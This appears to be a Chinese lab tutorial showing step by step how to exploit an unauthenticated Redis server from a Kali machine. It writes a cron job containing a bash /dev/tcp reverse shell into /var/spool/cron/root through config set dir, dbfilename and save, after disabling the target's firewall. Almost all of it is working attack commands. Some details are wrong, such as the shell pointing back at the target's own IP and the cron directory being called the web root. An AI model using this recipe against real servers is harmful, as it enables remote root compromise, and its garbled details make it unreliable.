利用redis漏洞反弹shell
攻击机:kali 192.168.32.132
目标机:centos7 192.168.32.144
(1)在目标机centos中安装redis服务器(redis-server)
解压,进入源码目录,然后编译(make、make install)
解压文件:tar -zxvf redis-2.8.17.tar.gz
移动解压文件
执行命令:mv redis-2.8.17 /usr/local/redis
进入到目录下:cd /usr/local/redis
执行make
启动redis-server服务
执行命令:[root@201808170022 src]# ./redis-server
取消centos规则:iptables -F
(2)在kali中安装redis cil
执行命令:wget http://download.redis.io/releases/redis- 2.8.17.tar.gz
解压文件:tar -zxvf redis-2.8.17.tar.gz
进入文件,执行make
cp src/redis-cli /usr/bin/
3.在kali服务器上监听一个端口
执行命令:nc -lvnp 7999
4.另启动命令窗口
测试目标靶机是否存在未授权访问
执行命令:./redis-cli -h 192.168.32.144![]()
在目标机centos中执行
执行命令:192.168.32.144:6379> set xx "\n* * * * * bash -i >& /dev/tcp/192.168.32.144/7999 0>&1\n"
把shell写入到网站根目录下(/var/spool/cron/)
执行命令:192.168.32.144:6379> config set dir /var/spool/cron/
写入文件名为root
执行命令:192.168.32.144:6379> config set dbfilename root
保存
执行命令192.168.32.144:6379> save
成功监听